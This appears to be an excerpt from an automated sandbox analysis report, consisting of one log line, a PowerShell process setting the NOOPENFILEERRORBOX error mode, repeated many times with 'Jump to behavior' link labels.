                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
